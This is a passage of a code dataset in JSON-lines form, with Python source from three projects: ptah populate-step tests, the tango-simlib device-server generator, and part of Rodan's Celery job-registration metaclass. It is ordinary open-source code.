Populate(self.registry).list_steps()\n steps = dict((s['name'], s) for s in steps)\n\n self.assertIn('custom-step1', steps)\n self.assertNotIn('custom-step2', steps)\n self.assertEqual(steps['custom-step1']['factory'], step1)\n\n def test_list_all(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps(all=True)\n steps = dict((s['name'], s) for s in steps)\n\n self.assertIn('custom-step1', steps)\n self.assertIn('custom-step2', steps)\n self.assertEqual(steps['custom-step1']['factory'], step1)\n self.assertEqual(steps['custom-step2']['factory'], step2)\n\n def test_list_explicit(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, factory=step1)\n\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps(('custom-step2',))\n steps = dict((s['name'], s) for s in steps)\n\n self.assertNotIn('custom-step1', steps)\n self.assertIn('custom-step2', steps)\n\n def test_list_requires_inactive(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, requires=('custom-step2',), factory=step1)\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps()\n d_steps = dict((s['name'], s) for s in steps)\n\n self.assertIn('custom-step1', d_steps)\n self.assertIn('custom-step2', d_steps)\n\n def test_list_requires_order(self):\n def step1(registry):\n \"\"\" \"\"\"\n def step2(registry):\n \"\"\" \"\"\"\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1',\n active=True, requires=('custom-step2',), factory=step1)\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2',\n active=False, factory=step2)\n\n steps = Populate(self.registry).list_steps()\n l_steps = [s['name'] for s in steps]\n\n self.assertTrue(l_steps.index('custom-step2') <\n l_steps.index('custom-step1'))\n\n def test_list_once(self):\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1', requires=('custom-step2',))\n self.config.ptah_populate_step(\n 'custom-step2', title='Custom step 2')\n self.config.ptah_populate_step(\n 'custom-step3', title='Custom step 3', requires=('custom-step2',))\n\n steps = Populate(self.registry).list_steps()\n\n count = 0\n for step in steps:\n if step['name'] == 'custom-step2':\n count += 1\n\n self.assertEqual(count, 1)\n\n def test_list_unknown(self):\n self.assertRaises(\n RuntimeError,\n Populate(self.registry).list_steps, ('unknown',))\n\n def test_list_unknown_dependency(self):\n self.config.ptah_populate_step(\n 'custom-step1', title='Custom step 1', requires=('unknown',))\n\n self.assertRaises(\n RuntimeError, Populate(self.registry).list_steps)\n\n\nclass TestCreateDbSchema(ptah.PtahTestCase):\n\n def test_event(self):\n from ptah.populate import create_db_schema\n\n data = [False]\n def event_handler(ev):\n data[0] = True\n\n self.registry.registerHandler(\n event_handler, (ptah.events.BeforeCreateDbSchema,))\n\n create_db_schema(self.registry)\n self.assertTrue(data[0])\n\n def test_skip_tables(self):\n from ptah.populate import create_db_schema\n\n base = ptah.get_base()\n\n class test_populate_TestTable(base):\n __tablename__ = 'test_populate_TestTable'\n\n id = sqla.Column('id', sqla.Integer, primary_key=True)\n\n cfg = ptah.get_settings(ptah.CFG_ID_PTAH)\n cfg['db_skip_tables'] = ('test_populate_TestTable',)\n\n create_db_schema(self.registry)\n\n self.assertFalse(\n base.metadata.tables['test_populate_TestTable'].exists())\n\n cfg['db_skip_tables'] = ()\n create_db_schema(self.registry)\n\n self.assertTrue(\n base.metadata.tables['test_populate_TestTable'].exists())\n","repo_name":"carlicos/ptah","sub_path":"ptah/tests/test_populate.py","file_name":"test_populate.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"41498106905","text":"from __future__ import absolute_import, division, print_function\nfrom future import standard_library\n\nstandard_library.install_aliases() # noqa: E402\n\nimport argparse\nimport logging\nimport os\nimport time\nimport weakref\nfrom builtins import map, object, range\nfrom functools import partial\n\nimport numpy as np\n\nfrom tango import (\n Attr,\n AttrDataFormat,\n AttrQuality,\n AttrWriteType,\n CmdArgType,\n DevState,\n UserDefaultAttrProp,\n)\nfrom tango.server import Device, attribute, device_property\nfrom tango_simlib.model import (\n Model,\n PopulateModelActions,\n PopulateModelProperties,\n PopulateModelQuantities,\n)\nfrom future.utils import with_metaclass\nfrom future.utils import itervalues\nfrom tango_simlib.sim_test_interface import TangoTestDeviceServerBase\nfrom tango_simlib.utilities import helper_module\nfrom tango_simlib.utilities.fandango_json_parser import FandangoExportDeviceParser\nfrom tango_simlib.utilities.sim_xmi_parser import XmiParser\nfrom tango_simlib.utilities.simdd_json_parser import SimddParser\n\nMODULE_LOGGER = logging.getLogger(__name__)\n\n\nclass TangoDeviceServerBase(Device):\n instances = weakref.WeakValueDictionary()\n\n def init_device(self):\n super(TangoDeviceServerBase, self).init_device()\n name = self.get_name()\n self.model = None\n self.instances[name] = self\n self.set_state(DevState.ON)\n\n def always_executed_hook(self):\n self.model.update()\n\n def read_attributes(self, attr):\n \"\"\"Method reading an attribute value.\n\n Parameters\n ----------\n attr : PyTango.DevAttr\n The attribute to read from.\n\n \"\"\"\n if self.get_state() != DevState.OFF:\n name = attr.get_name()\n value, update_time = self.model.quantity_state[name]\n quality = AttrQuality.ATTR_VALID\n attr.set_value_date_quality(value, update_time, quality)\n\n def write_attributes(self, attr):\n \"\"\"Method writing an attribute value.\n\n Parameters\n ----------\n attr : PyTango.DevAttr\n The attribute to write to.\n\n \"\"\"\n if self.get_state() != DevState.OFF:\n name = attr.get_name()\n data = attr.get_write_value()\n self.model.sim_quantities[name].set_val(data, self.model.time_func())\n\n\ndef add_static_attribute(tango_device_class, attr_name, attr_meta):\n \"\"\"Add any TANGO attribute of to the device server before start-up.\n\n Parameters\n ----------\n cls: class\n class object that the device server will inherit from\n attr_name: str\n Tango attribute name\n attr_meta: dict\n Meta data that enables the creation of a well configured attribute\n\n\n Note\n ====\n This is needed for DevEnum and spectrum type attributes\n\n \"\"\"\n polling_period = attr_meta[\"period\"]\n attr = attribute(\n label=attr_meta.get(\"label\", attr_name),\n dtype=attr_meta[\"data_type\"],\n enum_labels=attr_meta.get(\"enum_labels\", []),\n doc=attr_meta.get(\"description\", \"\"),\n dformat=attr_meta[\"data_format\"],\n max_dim_x=int(attr_meta[\"max_dim_x\"]),\n max_dim_y=int(attr_meta[\"max_dim_y\"]),\n access=getattr(AttrWriteType, attr_meta[\"writable\"], AttrWriteType.READ),\n polling_period=int(polling_period) if polling_period else -1,\n min_value=attr_meta.get(\"min_value\", \"\"),\n max_value=attr_meta.get(\"max_value\", \"\"),\n min_alarm=attr_meta.get(\"min_alarm\", \"\"),\n max_alarm=attr_meta.get(\"max_alarm\", \"\"),\n min_warning=attr_meta.get(\"min_warning\", \"\"),\n max_warning=attr_meta.get(\"max_warning\", \"\"),\n delta_val=attr_meta.get(\"delta_val\", \"\"),\n delta_t=attr_meta.get(\"delta_t\", \"\"),\n abs_change=attr_meta.get(\"abs_change\", \"\"),\n rel_change=attr_meta.get(\"rel_change\", \"\"),\n event_period=attr_meta.get(\"event_period\", \"\"),\n archive_abs_change=attr_meta.get(\"archive_abs_change\", \"\"),\n archive_rel_change=attr_meta.get(\"archive_rel_change\", \"\"),\n archive_period=attr_meta.get(\"archive_period\", \"\"),\n )\n attr.__name__ = attr_name\n\n # Attribute read method\n def read_meth(tango_device_instance, attr):\n name = attr.get_name()\n value, update_time = tango_device_instance.model.quantity_state[name]\n quality = AttrQuality.ATTR_VALID\n # For attributes that have a SPECTRUM data format, there is no need to\n # type cast them to an integer data type. we need assign the list of values\n # to the attribute value parameter.\n if type(value) in (list, np.ndarray):\n attr.set_value_date_quality(value, update_time, quality)\n else:\n attr.set_value_date_quality(int(value), update_time, quality)\n\n # Attribute write method for writable attributes\n if str(attr_meta[\"writable\"]) in (\"READ_WRITE\", \"WRITE\"):\n\n @attr.write\n def attr(tango_device_instance, new_val):\n # When selecting a model quantity we use the enum labels list indexing\n # to return the string value corresponding to the respective enum value\n # since an integer value is returned by device server when\n # attribute value is read\n _sim_quantities = tango_device_instance.model.sim_quantities\n tango_device_instance.model_quantity = _sim_quantities[attr_name]\n tango_device_instance.model_quantity.set_val(\n new_val, tango_device_instance.model.time_func()\n )\n\n read_meth.__name__ = \"read_{}\".format(attr_name)\n # Add the read method and the attribute to the class object\n setattr(tango_device_class, read_meth.__name__, read_meth)\n setattr(tango_device_class, attr.__name__, attr)\n\n\ndef _create_sim_test_interface_atttribute(models, class_instance):\n # Pick the first model instance in the dict.\n controllable_attribute_names = list(itervalues(models))[0].sim_quantities.keys()\n attr_control_meta = {}\n attr_control_meta[\"enum_labels\"] = sorted(controllable_attribute_names)\n attr_control_meta[\"data_format\"] = AttrDataFormat.SCALAR\n attr_control_meta[\"data_type\"] = CmdArgType.DevEnum\n attr_control_meta[\"label\"] = \"Attribute name\"\n attr_control_meta[\"description\"] = \"Attribute name to control\"\n attr_control_meta[\"max_dim_x\"] = 1\n attr_control_meta[\"max_dim_y\"] = 0\n attr_control_meta[\"writable\"] = \"READ_WRITE\"\n\n enum_labels = attr_control_meta.get(\"enum_labels\", \"\")\n attr = attribute(\n label=attr_control_meta[\"label\"],\n dtype=attr_control_meta[\"data_type\"],\n enum_labels=enum_labels,\n doc=attr_control_meta[\"description\"],\n dformat=attr_control_meta[\"data_format\"],\n max_dim_x=attr_control_meta[\"max_dim_x\"],\n max_dim_y=attr_control_meta[\"max_dim_y\"],\n access=getattr(AttrWriteType, attr_control_meta[\"writable\"]),\n fget=class_instance.read_fn,\n fset=class_instance.write_fn,\n )\n\n return attr\n\n\ndef get_tango_device_server(models, sim_data_files):\n \"\"\"Declares a tango device class that inherits the Device class and then\n adds tango attributes (DevEnum and Spectrum type).\n\n Parameters\n ----------\n models: dict\n A dictionary of model.Model instances.\n e.g. {'model-name': model.Model}\n sim_data_files: list\n A list of direct paths to either xmi/fgo/json data files.\n\n Returns\n -------\n TangoDeviceServer : PyTango.Device\n Tango device that has the commands dictionary populated.\n\n \"\"\"\n # Declare a Tango Device class for specifically adding static\n # attributes prior running the device server and controller\n class TangoDeviceServerStaticAttrs(object):\n pass\n\n class TangoTestDeviceServerStaticAttrs(object):\n pass\n\n def read_fn(tango_device_instance):\n return tango_device_instance._attribute_name_index\n\n def write_fn(tango_device_instance, val):\n tango_device_instance._attribute_name_index = val\n tango_device_instance.model_quantity = tango_device_instance.model.sim_quantities[\n sorted(tango_device_instance.model.sim_quantities.keys())[val]\n ]\n\n # Sim test interface static attribute `attribute_name` info\n TangoTestDeviceServerStaticAttrs.read_fn = read_fn\n TangoTestDeviceServerStaticAttrs.write_fn = write_fn\n attr = _create_sim_test_interface_atttribute(models, TangoTestDeviceServerStaticAttrs)\n attr.setter(TangoTestDeviceServerStaticAttrs.write_fn)\n TangoTestDeviceServerStaticAttrs.attribute_name = attr\n # We use the `add_static_attribute` method to add DevEnum and Spectrum type\n # attributes statically to the tango device before start-up since the\n # cannot be well configured when added dynamically. This is suspected\n # to be a bug.\n # TODO(AR 02-03-2017): Ask the tango community on the upcoming Stack\n # Exchange community (AskTango) and also make follow ups on the next tango\n # releases.\n static_attributes_added = []\n for quantity_name, quantity in list(itervalues(models))[0].sim_quantities.items():\n d_type = str(quantity.meta[\"data_type\"])\n d_format = str(quantity.meta[\"data_format\"])\n if d_type == \"DevEnum\" or d_format in (\"SPECTRUM\", \"IMAGE\"):\n add_static_attribute(\n TangoDeviceServerStaticAttrs, quantity_name, quantity.meta\n )\n static_attributes_added.append(quantity_name)\n\n MODULE_LOGGER.info(\n \"Static attributes addded to the device: [{}]\".format(static_attributes_added)\n )\n\n class TangoDeviceServer(TangoDeviceServerBase, TangoDeviceServerStaticAttrs):\n _models = models\n\n min_update_period = device_property(\n dtype=float,\n default_value=0.99,\n doc=\"Minimum time before model update method can be called again [seconds].\",\n )\n\n def init_device(self):\n super(TangoDeviceServer, self).init_device()\n self.model = self._models[self.get_name()]\n self._not_added_attributes = []\n write_device_properties_to_db(self.get_name(), self.model)\n self.model.reset_model_state()\n self.model.min_update_period = self.min_update_period\n self.initialize_dynamic_commands()\n\n # Only the .fgo file has the State as an attribute. The .xmi files has it as\n # a command, so it won't have an initial value. And in some other data\n # description files the State attribute is not specified.\n if \"State\" in self.model.sim_quantities:\n # Set default device state\n state_quantity = self.model.sim_quantities[\"State\"].meta\n state_value = int(state_quantity[\"value\"])\n self.set_state(DevState.values[state_value])\n\n def initialize_dynamic_commands(self):\n commands_added = []\n for action_name, action_handler in self.model.sim_actions.items():\n cmd_handler = helper_module.generate_cmd_handler(\n self.model, action_name, action_handler\n )\n setattr(TangoDeviceServer, action_name, cmd_handler)\n self.add_command(cmd_handler, device_level=True)\n commands_added.append(action_name)\n\n MODULE_LOGGER.info(\n \"Dynamic commands added to the device: [{}]\".format(commands_added)\n )\n\n def initialize_dynamic_attributes(self):\n model_sim_quants = self.model.sim_quantities\n attribute_list = set([attr for attr in model_sim_quants.keys()])\n attributes_added = []\n for attribute_name in attribute_list:\n meta_data = model_sim_quants[attribute_name].meta\n # Dynamically add all attributes except those with DevEnum data type,\n # and SPECTRUM data format since they are added statically to the device\n # class prior to start-up. Also exclude attributes with a data format\n # 'IMAGE' as we currently do not handle them.\n if not self._is_attribute_addable_dynamically(meta_data):\n continue\n # The return value of rwType is a string and it is required as a\n # PyTango data type when passed to the Attr function.\n # e.g. 'READ' -> tango._tango.AttrWriteType.READ\n rw_type = meta_data[\"writable\"]\n rw_type = getattr(AttrWriteType, rw_type)\n attr = self._create_attribute(\n attribute_name, meta_data[\"data_type\"], rw_type\n )\n if attr is None:\n continue\n\n self._configure_attribute_default_properties(attr, meta_data)\n self._add_dynamic_attribute(attr, rw_type)\n\n MODULE_LOGGER.info(\n \"Dynamic attributes added to the device: [{}]\".format(attributes_added)\n )\n\n def _add_dynamic_attribute(self, attribute, read_write_type):\n if read_write_type in (AttrWriteType.READ, AttrWriteType.READ_WITH_WRITE):\n self.add_attribute(attribute, r_meth=self.read_attributes)\n elif read_write_type == AttrWriteType.WRITE:\n self.add_attribute(attribute, w_meth=self.write_attributes)\n elif read_write_type == AttrWriteType.READ_WRITE:\n self.add_attribute(\n attribute, r_meth=self.read_attributes, w_meth=self.write_attributes\n )\n\n def _is_attribute_addable_dynamically(self, quantity_meta_data):\n attr_dtype = quantity_meta_data[\"data_type\"]\n d_format = quantity_meta_data[\"data_format\"]\n if str(attr_dtype) == \"DevEnum\" or str(d_format) in (\"SPECTRUM\", \"IMAGE\"):\n return False\n\n return True\n\n def _create_attribute(self, attribute_name, attr_dtype, rw_type):\n attribute = None\n # Add a try/except clause when creating an instance of Attr class\n # as PyTango may raise an error when things go wrong.\n try:\n attribute = Attr(attribute_name, attr_dtype, rw_type)\n except Exception as e:\n self._not_added_attributes.append(attribute_name)\n MODULE_LOGGER.error(\n \"Attribute %s could not be added dynamically\"\n \" due to an error raised %s.\",\n attribute_name,\n str(e),\n )\n\n return attribute\n\n def _configure_attribute_default_properties(self, attribute, quantity_meta_data):\n attribute_properties = UserDefaultAttrProp()\n for prop, prop_value in quantity_meta_data.items():\n # NB: Calling 'set_enum_labels' or setting the 'enum_labels' results\n # in a error, and we do not need to do anyway as DevEnum attributes are\n # handled by the `add_static_attribute` method.\n if prop == \"enum_labels\":\n continue\n\n # UserDefaultAttrProp does not have the property 'event_period' but does\n # have a setter method for it.\n if prop == \"event_period\":\n attribute_properties.set_event_period(prop_value)\n continue\n\n attribute_name = quantity_meta_data[\"name\"]\n if hasattr(attribute_properties, prop):\n try:\n setattr(attribute_properties, prop, prop_value)\n except Exception as e:\n MODULE_LOGGER.error(\n \"The attribute '%s's property '%s' could not be set to \"\n \"value '%s' due to an error raised %s.\",\n attribute_name,\n prop,\n prop_value,\n str(e),\n )\n else:\n MODULE_LOGGER.debug(\n \"UserDefaultAttrProp has no attribute named '%s' \"\n \"for the device attribute '%s'.\",\n prop,\n attribute_name,\n )\n\n attribute.set_default_properties(attribute_properties)\n\n @attribute(\n dtype=(str,),\n doc=\"List of attributes that were not added to the \"\n \"device due to an error.\",\n max_dim_x=10000,\n )\n def AttributesNotAdded(self):\n return self._not_added_attributes\n\n @attribute(\n dtype=int,\n doc=\"Number of attributes not added to the device due to an error.\",\n )\n def NumAttributesNotAdded(self):\n return len(self._not_added_attributes)\n\n class SimControl(TangoTestDeviceServerBase, TangoTestDeviceServerStaticAttrs):\n instances = weakref.WeakValueDictionary()\n\n def init_device(self):\n super(SimControl, self).init_device()\n\n name = self.get_name()\n self.instances[name] = self\n\n klass_name = get_device_class(sim_data_files)\n TangoDeviceServer.TangoClassName = klass_name\n TangoDeviceServer.__name__ = klass_name\n SimControl.TangoClassName = \"%sSimControl\" % klass_name\n SimControl.__name__ = \"%sSimControl\" % klass_name\n return [TangoDeviceServer, SimControl]\n\n\ndef write_device_properties_to_db(device_name, model, db_instance=None):\n \"\"\"Writes device properties, including optional default value, to tango DB.\n\n Parameters\n ----------\n device_name : str\n A TANGO device name\n model : model.Model instance\n Device model instance\n db_instance : tango._tango.Database instance\n Tango database instance\n \"\"\"\n if not db_instance:\n db_instance = helper_module.get_database()\n\n for prop_name, prop_meta in model.sim_properties.items():\n db_instance.put_device_property(\n device_name, {prop_name: prop_meta[\"DefaultPropValue\"]}\n )\n\n\ndef get_parser_instance(sim_datafile):\n \"\"\"This method returns an appropriate parser instance to generate a Tango device.\n\n Parameters\n ----------\n sim_datafile : str\n A direct path to the xmi/json/fgo file.\n\n Returns\n ------\n parser_instance: Parser instance\n The Parser object which reads an xmi/json/fgo file and parses it into device\n attributes, commands, and properties.\n\n \"\"\"\n extension = os.path.splitext(sim_datafile)[-1]\n extension = extension.lower()\n parser_instance = None\n if extension in [\".xmi\"]:\n parser_instance = XmiParser()\n parser_instance.parse(sim_datafile)\n elif extension in [\".json\"]:\n parser_instance = SimddParser()\n parser_instance.parse(sim_datafile)\n elif extension in [\".fgo\"]:\n parser_instance = FandangoExportDeviceParser()\n parser_instance.parse(sim_datafile)\n return parser_instance\n\n\ndef configure_device_model(sim_data_file=None, test_device_name=None, logger=None):\n models = configure_device_models(sim_data_file, test_device_name, logger)\n if len(models) == 1:\n return models\n else:\n raise RuntimeError(\n \"Single model expected, but found {} devices\"\n \" registered under device server class {}. Rather use\"\n \" `configure_device_models`.\".format(\n len(models), get_device_class(sim_data_file)\n )\n )\n\n\ndef configure_device_models(sim_data_file=None, test_device_name=None, logger=None):\n \"\"\"\n In essence this function should get the data descriptor file, parse it,\n take the attribute and command information, populate the model(s) quantities and\n actions to be simulated and return that model.\n\n Parameters\n ----------\n sim_datafile : list\n A list of direct paths to either xmi/json/fgo files.\n test_device_name : str\n A TANGO device name. This is used for running tests as we want the model\n instance and the device name to have the same name.\n\n Returns\n -------\n models : dict\n A dictionary of model.Model instances\n\n \"\"\"\n data_file = sim_data_file\n klass_name = get_device_class(data_file)\n dev_names = None\n if test_device_name is None:\n server_name = helper_module.get_server_name()\n db_instance = helper_module.get_database()\n # db_datum is a PyTango.DbDatum structure with attribute name and value_string.\n # The name attribute represents the name of the device server and the\n # value_string attribute is a list of all the registered device instances in\n # that device server instance for the TANGO class 'TangoDeviceServer'.\n db_datum = db_instance.get_device_name(server_name, klass_name)\n # We assume that at least one device instance has been\n # registered for that class and device server.\n dev_names = getattr(db_datum, \"value_string\")\n if not dev_names:\n dev_name = \"test/nodb/tangodeviceserver\"\n else:\n dev_name = test_device_name\n\n # In case there are more than one data description files to be used to configure the\n # device.\n parsers = []\n for file_name in data_file:\n parsers.append(get_parser_instance(file_name))\n\n # In case there is more than one device instance per class.\n models = {}\n if dev_names:\n for dev_name in dev_names:\n models[dev_name] = Model(dev_name, logger=logger)\n else:\n models[dev_name] = Model(dev_name, logger=logger)\n\n # In case there is more than one parser instance for each file\n for model in models.values():\n command_info = {}\n properties_info = {}\n override_info = {}\n for parser in parsers:\n PopulateModelQuantities(parser, model.name, model)\n command_info.update(parser.get_device_command_metadata())\n properties_info.update(\n parser.get_device_properties_metadata(\"deviceProperties\")\n )\n override_info.update(parser.get_device_cmd_override_metadata())\n PopulateModelActions(command_info, override_info, model.name, model)\n PopulateModelProperties(properties_info, model.name, model)\n return models\n\n\ndef generate_device_server(server_name, sim_data_files, directory=\"\"):\n \"\"\"Create a tango device server python file.\n\n Parameters\n ----------\n server_name: str\n Tango device server name\n sim_data_files: list\n A list of direct paths to either xmi/fgo/json data files.\n\n \"\"\"\n lines = [\n \"#!/usr/bin/env python\",\n \"from tango.server import server_run\",\n (\n \"from tango_simlib.tango_sim_generator import (\"\n \"configure_device_models, get_tango_device_server)\"\n ),\n \"\\n\\n# File generated on {} by tango-simlib-generator\".format(time.ctime()),\n \"\\n\\ndef main():\",\n \" sim_data_files = {}\".format(sim_data_files),\n \" models = configure_device_models(sim_data_files)\",\n \" TangoDeviceServers = get_tango_device_server(models, sim_data_files)\",\n \" server_run(TangoDeviceServers)\",\n '\\nif __name__ == \"__main__\":',\n \" main()\\n\",\n ]\n with open(os.path.join(directory, \"%s\" % server_name), \"w\") as dserver:\n dserver.write(\"\\n\".join(lines))\n # Make the script executable\n os.chmod(os.path.join(directory, \"%s\" % server_name), 477)\n\n\ndef get_device_class(sim_data_files):\n \"\"\"Get device class name from specified xmi/simdd description file.\n\n Parameters\n ----------\n sim_data_files: list\n A list of direct paths to either xmi/json/fgo data files.\n\n Returns\n -------\n klass_name: str\n Tango device class name\n\n \"\"\"\n if len(sim_data_files) < 1:\n raise Exception(\"No simulator data file specified.\")\n\n parser_instance = None\n klass_name = \"\"\n precedence_map = {\".xmi\": 1, \".fgo\": 2, \".json\": 3}\n\n def get_precedence(file_name):\n extension = os.path.splitext(file_name)[-1]\n extension = extension.lower()\n return precedence_map.get(extension, 100)\n\n sorted_files = sorted(sim_data_files, key=get_precedence)\n parser_instance = get_parser_instance(sorted_files[0])\n\n # Since at the current moment the class name of the tango simulator to be\n # generated must be specified in the xmi data file, if no xmi if provided\n # the simulator will be given a default name.\n if parser_instance:\n klass_name = parser_instance.device_class_name\n else:\n klass_name = \"TangoDeviceServer\"\n\n return klass_name\n\n\ndef get_argparser():\n parser = argparse.ArgumentParser(\n description=\"Generate a tango data driven simulator, handling\"\n \" registration as needed. Supports multiple device per process.\"\n )\n required_argument = partial(parser.add_argument, required=True)\n required_argument(\n \"--sim-data-file\",\n action=\"append\",\n help=\"Simulator description data files(s) \" \".i.e. can specify multiple files\",\n )\n required_argument(\"--directory\", help=\"TANGO server executable path\", default=\"\")\n required_argument(\"--dserver-name\", help=\"TANGO server executable command\")\n return parser\n\n\ndef main():\n arg_parser = get_argparser()\n opts = arg_parser.parse_args()\n generate_device_server(\n opts.dserver_name, opts.sim_data_file, directory=opts.directory\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-sa/tango-simlib","sub_path":"tango_simlib/tango_sim_generator.py","file_name":"tango_sim_generator.py","file_ext":"py","file_size_in_byte":25617,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"37348445659","text":"import contextlib\nimport copy\nimport inspect\n\n# import json\nimport jsonschema\nimport tempfile\nimport os\n\n# import re\nimport shutil\nimport sys\nimport time\nimport uuid\n\nfrom celery import Task, registry\nfrom celery.app.task import TaskType\nfrom django.conf import settings as rodan_settings\nfrom django.core.files import File\nfrom django.db import transaction\nfrom django.template import Template\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom rest_framework import status\n\nfrom rodan.constants import task_status\nfrom rodan.exceptions import CustomAPIException\nfrom rodan.models import (\n RunJob,\n Input,\n Output,\n Resource,\n ResourceType,\n Job,\n InputPortType,\n OutputPortType,\n WorkflowRun,\n)\nfrom rodan.jobs.deep_eq import deep_eq\nfrom rodan.jobs.convert_to_str import convert_to_str\n\nimport logging\n\nlogger = logging.getLogger(\"rodan\")\n\nif sys.version_info.major == 2:\n input = raw_input # noqa\n\n\nclass RodanTaskType(TaskType):\n \"\"\"\n This is the metaclass for RodanTask base class.\n\n Every time a new task inherits RodanTask, __init__ method of this metaclass is\n triggered, which registers the new task in Rodan database.\n\n Note: TaskType is the metaclass of Task (Celery objects)\n \"\"\"\n\n def __new__(cls, clsname, bases, attrs):\n attrs[\"_abstract\"] = attrs.get(\n \"abstract\"\n ) # Keep a copy as Celery TaskType will delete it.\n\n if not attrs[\"_abstract\"]:\n module_name = attrs[\"__module__\"]\n if module_name.startswith(\"rodan.jobs.\"):\n attrs[\"_package_name\"] = (\n \"rodan.jobs.\" + module_name[len(\"rodan.jobs.\"):].split(\".\", 1)[0]\n )\n else:\n if settings.TEST and module_name == \"rodan.test.dummy_jobs\":\n attrs[\"_package_name\"] = \"rodan.test.dummy_jobs\"\n else:\n raise ValueError(\n (\n \"Invalid use of Rodan jobs - job package must\"\n \" locate in /rodan/jobs/\"\n )\n )\n\n return TaskType.__new__(cls, clsname, bases, attrs)\n\n def __init__(cls, clsname, bases, attrs):\n super(RodanTaskType, cls).__init__(clsname, bases, attrs)\n\n # check the number of arguments of implemented function\n if \"run_my_task\" in attrs:\n argspec = inspect.getargspec(attrs[\"run_my_task\"])\n assert len(argspec.args) == 4, \"run_my_task\"\n if \"get_my_interface\" in attrs:\n argspec = inspect.getargspec(attrs[\"get_my_interface\"])\n assert len(argspec.args) == 3, \"get_my_interface\"\n if \"validate_my_user_input\" in attrs:\n argspec = inspect.getargspec(attrs[\"validate_my_user_input\"])\n assert len(argspec.args) == 4, \"validate_my_user_input\"\n if \"test_my_task\" in attrs:\n argspec = inspect.getargspec(attrs[\"test_my_task\"])\n assert len(argspec.args) == 2, \"test_my_task\"\n\n # not the abstract class\n if attrs.get(\"_abstract\") is True:\n return\n else:\n\n # Set base settings schema if they do not already exist in the job.\n schema = attrs.get(\"settings\", {\"job_queue\": \"celery\", \"type\": \"object\"})\n\n if not Job.objects.filter(name=attrs[\"name\"]).exists():\n if (not getattr(settings, \"_update_rodan_jobs\", None) and not settings.TEST):\n raise ImproperlyConfigured(\n (\n \"The catalogue of local jobs does not match the ones in \"\n \"database: local job `{0}` has not been registered. Please\"\n \" run `manage.py migrate` on Rodan server to update the database.\"\n ).format(attrs[\"name\"])\n )\n\n try:\n # verify the schema\n jsonschema.Draft4Validator.check_schema(attrs[\"settings\"])\n except jsonschema.exceptions.SchemaError as e:\n raise e\n\n j = Job(\n name=attrs[\"name\"],\n author=attrs[\"author\"],\n description=attrs[\"description\"],\n settings=schema,\n enabled=attrs[\"enabled\"],\n category=attrs[\"category\"],\n interactive=attrs[\"interactive\"],\n # Check for the presence of job_queue in the rodan job's settings, if\n # not use the default 'celery'\n job_queue=schema.get(\"job_queue\", \"celery\"),\n )\n j.save()\n #print(attrs[\"name\"])\n\n try:\n for ipt in attrs[\"input_port_types\"]:\n i = InputPortType(\n job=j,\n name=ipt[\"name\"],\n minimum=ipt[\"minimum\"],\n maximum=ipt[\"maximum\"],\n is_list=ipt.get(\"is_list\", False),\n )\n i.save()\n resource_types = RodanTaskType._resolve_resource_types(\n ipt[\"resource_types\"]\n )\n if len(resource_types) == 0:\n raise ValueError(\n (\n \"No available resource types found for \"\n \"this InputPortType: {0}\"\n ).format(ipt[\"resource_types\"])\n )\n i.resource_types.add(*resource_types)\n for opt in attrs[\"output_port_types\"]:\n o = OutputPortType(\n job=j,\n name=opt[\"name\"],\n minimum=opt[\"minimum\"],\n maximum=opt[\"maximum\"],\n is_list=opt.get(\"is_list\", False),\n )\n o.save()\n resource_types = RodanTaskType._resolve_resource_types(\n opt[\"resource_types\"]\n )\n if len(resource_types) == 0:\n raise ValueError(\n (\n \"No available resource types found for this\"\n \" OutputPortType: {0}\"\n ).format(opt[\"resource_types\"])\n )\n o.resource_types.add(*resource_types)\n except Exception as e:\n j.delete() # clean the job\n raise e\n\n if not settings.TEST:\n print(\"Added: {0}\".format(j.name))\n else:\n UPDATE_JOBS = getattr(rodan_settings, \"_update_rodan_jobs\", False)\n # perform an integrity check, and update jobs if demanded.\n j = Job.objects.get(name=attrs[\"name\"])\n\n def check_field(\n field_name,\n original_value,\n new_value,\n compare_fn=lambda x, y: x == y,\n ):\n if not compare_fn(original_value, new_value):\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of Job `{1}` seems to be updated: {2} --> {3}.\"\n \" Try to run `manage.py migrate` to confirm this update.\"\n ).format(\n field_name,\n j.name,\n convert_to_str(original_value),\n convert_to_str(new_value),\n )\n ) # noqa\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of Job `{1}` seems to be updated: \\n{2}\\n \"\n \"-->\\n{3}\\n\\nConfirm (y/N)? \"\n ).format(\n field_name,\n j.name,\n convert_to_str(original_value),\n convert_to_str(new_value),\n )\n ) # noqa\n if confirm_update:\n setattr(j, field_name, new_value)\n j.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n check_field(\"author\", j.author, attrs[\"author\"])\n check_field(\"description\", j.description, attrs[\"description\"])\n check_field(\n \"settings\",\n j.settings,\n schema,\n compare_fn=lambda x, y: deep_eq(x, y),\n )\n check_field(\"enabled\", j.enabled, attrs[\"enabled\"])\n check_field(\"category\", j.category, attrs[\"category\"])\n check_field(\"interactive\", j.interactive, attrs[\"interactive\"])\n 